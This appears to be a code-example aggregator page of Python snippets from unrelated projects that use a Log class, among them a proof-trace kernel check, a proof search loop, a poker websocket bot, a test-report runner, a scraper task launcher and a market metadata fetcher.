            ), 'rb') as f:
        t = pickle.load(f)

    k = ProofTraceKernel(
        os.path.expanduser(config.get('prooftrace_dataset_dir')),
        config.get('prooftrace_dataset_size'),
    )

    print("==============================")
    print("ProofTrace Fusion testing \\o/")
    print("------------------------------")

    fusion = Fusion(t)

    for i in range(len(k._proofs)):
        step = k._proofs[i]

        thm = None

        if step[0] in ('DEFINITION', 'TYPE_DEFINITION', 'AXIOM'):
            thm = Thm(
                i,
                [t.term(hy) for hy in k._theorems[i]['hy']],
                t.term(k._theorems[i]['cc']),
            )

        if step[0] == 'REFL':
            thm = fusion.REFL(t.term(step[1]))

        if step[0] == 'TRANS':
            thm = fusion.TRANS(
                step[1],
                step[2],
            )

        if step[0] == 'MK_COMB':
            thm = fusion.MK_COMB(
                step[1],
                step[2],
            )

        if step[0] == 'ABS':
            thm = fusion.ABS(step[1], t.term(step[2]))

        if step[0] == 'BETA':
            thm = fusion.BETA(t.term(step[1]))

        if step[0] == 'ASSUME':
            thm = fusion.ASSUME(t.term(step[1]))

        if step[0] == 'EQ_MP':
            thm = fusion.EQ_MP(
                step[1],
                step[2],
            )

        if step[0] == 'DEDUCT_ANTISYM_RULE':
            thm = fusion.DEDUCT_ANTISYM_RULE(
                step[1],
                step[2],
            )

        if step[0] == 'INST':
            thm = fusion.INST(
                step[1],
                [[t.term(s[0]), t.term(s[1])] for s in step[2]],
            )

        if step[0] == 'INST_TYPE':
            thm = fusion.INST_TYPE(
                step[1],
                [[t.type(s[0]), t.type(s[1])] for s in step[2]],
            )

        if thm is None:
            Log.out("NOT IMPLEMENTED", {
                'action': step[0],
            })
            return

        # Reinsert the theorem where it belongs in the fusion kernel
        thm._index = i
        fusion.PREMISE(thm)

        org = Thm(
            i,
            [t.term(hy) for hy in k._theorems[i]['hy']],
            t.term(k._theorems[i]['cc']),
        )

        Log.out("STEP", {
            'index': i,
            'rule': step[0],
        })

        if thm.thm_string() != org.thm_string():
            Log.out("DIVERGENCE", {
                'org': org.thm_string(),
            })
            Log.out("DIVERGENCE", {
                'thm': thm.thm_string(),
            })
            return
Example #26
#! /usr/bin/env python
# -*- coding:utf-8 -*-

from websocket import create_connection
import sys
import json
from bot import HeartPlayBot
from utils.log import Log

IS_DEBUG = False
IS_SAVE_DATA = False
system_log = Log(IS_DEBUG)


class PokerSocket(object):
    ws = ""

    def __init__(self, player_name, player_number, token, connect_url,
                 poker_bot):
        self.player_name = player_name
        self.connect_url = connect_url
        self.player_number = player_number
        self.poker_bot = poker_bot
        self.token = token

    def takeAction(self, action, data):
        if action == "new_game":
            self.poker_bot.new_game(data)
        # unit : episode
        # init also reset Player
        # init state (init value = 0)
Example #27
    def run_once(self):
        for m in self._model.modules():
            self._model.modules()[m].train()

        run_start = time.time()

        self._policy_optimizer.zero_grad()

        infos = self._syn.reduce(self._device, self._min_update_count)

        if len(infos) == 0:
            time.sleep(1)
            return

        self._policy_optimizer.step()

        self._syn.broadcast({'config': self._config})

        if self._last_update is not None:
            update_delta = time.time() - self._last_update
        else:
            update_delta = 0.0
        self._last_update = time.time()

        act_loss_meter = Meter()
        lft_loss_meter = Meter()
        rgt_loss_meter = Meter()
        test_act_loss_meter = Meter()
        test_lft_loss_meter = Meter()
        test_rgt_loss_meter = Meter()

        for info in infos:
            if 'act_loss' in info:
                act_loss_meter.update(info['act_loss'])
            if 'lft_loss' in info:
                lft_loss_meter.update(info['lft_loss'])
            if 'rgt_loss' in info:
                rgt_loss_meter.update(info['rgt_loss'])
            if 'test_act_loss' in info:
                test_act_loss_meter.update(info['test_act_loss'])
            if 'test_lft_loss' in info:
                test_lft_loss_meter.update(info['test_lft_loss'])
            if 'test_rgt_loss' in info:
                test_rgt_loss_meter.update(info['test_rgt_loss'])

        Log.out(
            "PROOFTRACE SYN RUN", {
                'epoch': self._epoch,
                'run_time': "{:.2f}".format(time.time() - run_start),
                'update_count': len(infos),
                'update_delta': "{:.2f}".format(update_delta),
                'act_loss': "{:.4f}".format(act_loss_meter.avg or 0.0),
                'lft_loss': "{:.4f}".format(lft_loss_meter.avg or 0.0),
                'rgt_loss': "{:.4f}".format(rgt_loss_meter.avg or 0.0),
                'test_act_loss': "{:.4f}".format(test_act_loss_meter.avg
                                                 or 0.0),
                'test_lft_loss': "{:.4f}".format(test_lft_loss_meter.avg
                                                 or 0.0),
                'test_rgt_loss': "{:.4f}".format(test_rgt_loss_meter.avg
                                                 or 0.0),
            })

        if self._tb_writer is not None:
            self._tb_writer.add_scalar(
                "prooftrace_lm_train/update_delta",
                update_delta,
                self._epoch,
            )
            self._tb_writer.add_scalar(
                "prooftrace_lm_train/update_count",
                len(infos),
                self._epoch,
            )
            if act_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/act_loss",
                    act_loss_meter.avg,
                    self._epoch,
                )
            if lft_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/lft_loss",
                    lft_loss_meter.avg,
                    self._epoch,
                )
            if rgt_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_train/rgt_loss",
                    rgt_loss_meter.avg,
                    self._epoch,
                )

            if test_act_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_test/act_loss",
                    test_act_loss_meter.avg,
                    self._epoch,
                )
            if test_lft_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_test/lft_loss",
                    test_lft_loss_meter.avg,
                    self._epoch,
                )
            if test_rgt_loss_meter.avg is not None:
                self._tb_writer.add_scalar(
                    "prooftrace_lm_test/rgt_loss",
                    test_rgt_loss_meter.avg,
                    self._epoch,
                )

        self._epoch += 1

        if self._epoch % 100 == 0:
            self.save()
Example #28
"""

import os
import time
import unittest

from case.test_example import MyTest
from common.HTMLTestReportCN import HTMLTestRunner
from utils.config import Config
from common.element_enum import Element
from utils.log import Log
from utils.my_email import Email

if __name__ == '__main__':
    # Logger
    Log.info('begin test...')
    # Read the config file
    config = Config()

    # Build the test suite
    suite = unittest.TestSuite()
    suite.addTests(unittest.TestLoader().loadTestsFromTestCase(MyTest))

    # Build the HTML report filename
    now = time.strftime("%Y-%m-%d %Hh_%Mm", time.localtime(time.time()))
    filename = os.path.join(Element.REPORT_DIR, now + "_report.html")

    # Run the tests with HTMLTestRunner and generate the report
    with open(filename, "wb") as fl:
        report = config.get("report")
        runner = HTMLTestRunner(stream=fl,
Example #29
 def _remove_ack_msg(self, msg: Message):
     """ Removes the ack message """
     Log.log(MsgType.SUCCESS, "Adapter - ACK", msg)
     # pop with a default avoids a KeyError for unknown message ids.
     self._validation.pop(str(msg.msg_id), None)
Example #30
def task(t_n=2,
         d_n=4,
         is_test=False,
         is_timer=True,
         is_category=True,
         is_book=True,
         is_item=True,
         is_download=True):
    '''
    t_n: number of table-update threads
    d_n: number of download threads
    '''

    root_log = Log(filename=u'log.log', name='root')
    root_logger = root_log.Logger
    table = Table(logger=root_logger)
    table.create_tables()

    tasks = []

    # Fetch category info
    if is_category:

        task_categorys = threading.Thread(target=task_category,
                                          name='Thread-task-category',
                                          kwargs=dict(logger=root_logger,
                                                      is_test=is_test))
        tasks.append(task_categorys)

    # Fetch book info for each category
    if is_book:
        log = Log(filename='book.log', name=u'book')
        book_logger = log.Logger
        task_books = task_book(logger=book_logger, t_n=t_n, is_test=is_test)
        tasks = tasks + task_books

    # Fetch chapter info for each book
    if is_item:
        item_log = Log(filename=u'item.log', name='item')
        item_logger = item_log.Logger
        task_items = task_item(logger=item_logger, t_n=t_n, is_test=is_test)
        tasks = tasks + task_items

    # Fetch chapters that have not been downloaded yet
    if is_download:

        download_log = Log(filename=u'download.log', name='download')
        download_logger = download_log.Logger
        task_downloads = task_download(logger=download_logger, t_n=d_n)
        tasks = tasks + task_downloads

    # Periodically update book_count in table category and d_count/total/rate in table book
    if is_timer:
        table_log = Log(filename=u'table.log', name='table')
        table_logger = table_log.Logger
        task_tables = task_table(logger=table_logger, t_n=d_n, is_test=is_test)
        tasks = tasks + task_tables

    for t in tasks:
        t.start()

    for t in tasks:
        t.join()

    print u'all jobs finished'
Example #31
def search():
    parser = argparse.ArgumentParser(description="")

    parser.add_argument(
        'config_path',
        type=str, help="path to the config file",
    )
    parser.add_argument(
        '--dataset_size',
        type=str, help="config override",
    )
    parser.add_argument(
        '--load_dir',
        type=str, help="config override",
    )

    parser.add_argument(
        '--device',
        type=str, help="config override",
    )

    args = parser.parse_args()

    config = Config.from_file(args.config_path)

    if args.device is not None:
        config.override('device', args.device)

    if args.dataset_size is not None:
        config.override(
            'prooftrace_dataset_size',
            args.dataset_size,
        )
    if args.load_dir is not None:
        config.override(
            'prooftrace_load_dir',
            os.path.expanduser(args.load_dir),
        )

    dataset_dir = os.path.join(
        os.path.expanduser(config.get('prooftrace_dataset_dir')),
        config.get('prooftrace_dataset_size'),
        'test_traces'
    )

    assert os.path.isdir(dataset_dir)
    files = [
        os.path.join(dataset_dir, f)
        for f in os.listdir(dataset_dir)
        if os.path.isfile(os.path.join(dataset_dir, f))
    ]
    cases = []

    with gzip.open(
            os.path.join(
                os.path.expanduser(config.get('prooftrace_dataset_dir')),
                config.get('prooftrace_dataset_size'),
                'traces.tokenizer',
            ), 'rb') as f:
        tokenizer = pickle.load(f)

    for p in files:
        match = re.search(r"_(\d+)_(\d+)\.actions$", p)
        if match is None:
            continue
        ptra_len = int(match.group(1))
        cases.append((p, ptra_len))

    Log.out(
        "Loaded ProofTraceActions", {
            'cases': len(cases),
        })

    model = SearchModel(config).load()

    cases = sorted(cases, key=lambda c: c[1])

    for i in range(len(cases)):
        c = cases[i][0]
        with gzip.open(c, 'rb') as f:
            ground = pickle.load(f)

        ptra = ProofTraceActions(
            'BEAM-{}-{}'.format(
                datetime.datetime.now().strftime("%Y%m%d_%H%M_%S.%f"),
                random.randint(0, 9999),
            ),
            [
                ground.actions()[i] for i in range(ground.len())
                if ground.actions()[i].value in INV_PREPARE_TOKENS
            ],
            [
                ground.arguments()[i] for i in range(ground.len())
                if ground.actions()[i].value in INV_PREPARE_TOKENS
            ],
        )
        repl = REPL(tokenizer)
        target = repl.prepare(ptra)

        offset = 0
        fixed_gamma = 4
        if fixed_gamma > 0:
            gamma_len = max(ground.action_len() - fixed_gamma, 0)
            offset = ground.prepare_len() + gamma_len

            for i in range(gamma_len):
                assert ground.prepare_len() + i < ground.len() - 1
                pos = ground.prepare_len() + i

                action = ground.actions()[pos]
                argument = ground.arguments()[pos]

                thm = repl.apply(action)

                action._index = thm.index()
                argument._index = thm.index()

                ptra.append(action, argument)

        Log.out("TARGET", {
            'name': ground.name(),
            'prepare_length': ground.prepare_len(),
            'length': ground.action_len(),
            'summary': ground.summary(offset),
        })

        search = None
        if config.get('prooftrace_search_type') == 'beam':
            search = Beam(config, model, ptra, repl, target)
        if config.get('prooftrace_search_type') == 'mcts':
            search = MCTS(config, model, ptra, repl, target)
        assert search is not None

        depth = config.get('prooftrace_search_depth')
        if config.get('prooftrace_search_type') == 'beam':
            depth = fixed_gamma * 2

        for i in range(depth):
            done, ptra, proved = search.step(False, offset)
            if done:
                break
Example #32
class WeaponMetadata:
    def sql_values(self):
        # getattr with a default covers attributes that may never
        # have been set (see the KeyError handler in __init__).
        return (
            str(getattr(self, 'item_name', '#DataNotFound#')),
            str(getattr(self, 'buff_id', '#DataNotFound#')),
            str(getattr(self, 'meta_data_refreshed_time', '#DataNotFound#')),
            str(getattr(self, 'type', '#DataNotFound#')),
            str(getattr(self, 'exhibition_image', '#DataNotFound#')),
            str(getattr(self, 'steam_market_url', '#DataNotFound#')),
        )

    def __init__(self, buff_id, db):
        self.buff_id = buff_id
        self.logger = Log('Weapon-Metadata')

        query_result = db.query_weapon_metadata(buff_id)

        if not query_result[0]:

            url = api_concat(api_list.BUFF_SELL_ORDER_API, buff_id)
            request = requests.get(url, headers=HEADERS, cookies=COOKIES)
            request.encoding = 'utf-8'
            content = request.text

            if content:
                jsonified = json.loads(content)

                if jsonified['code'] == 'OK':

                    item = jsonified['data']['goods_infos'][str(buff_id)]

                    try:

                        self.item_name = item['name']
                        self.meta_data_refreshed_time = time.time()
                        self.steam_market_url = 'https://steamcommunity.com/market/listings/730/' + str(
                            item['market_hash_name']).replace(' ', '%20')
                        self.exhibition_image = item['icon_url']
                        self.type = item['tags']['category']['internal_name']

                    # If a single field is missing, leave the attribute unset;
                    # the database will store it as NULL.
                    except KeyError:
                        self.logger.log(
                            'Item %s is missing some metadata fields.' %
                            str(buff_id))

                else:
                    raise ValueError('[WeaponMetadata] Buff fetch error.')
            else:
                raise ValueError('Buff returned nothing.')
        else:
            self.item_name, self.meta_data_refreshed_time, self.steam_market_url, self.exhibition_image, self.type = \
                (query_result[1][0][0], query_result[1][0][2], query_result[1][0][5], query_result[1][0][4],
                 query_result[1][0][3])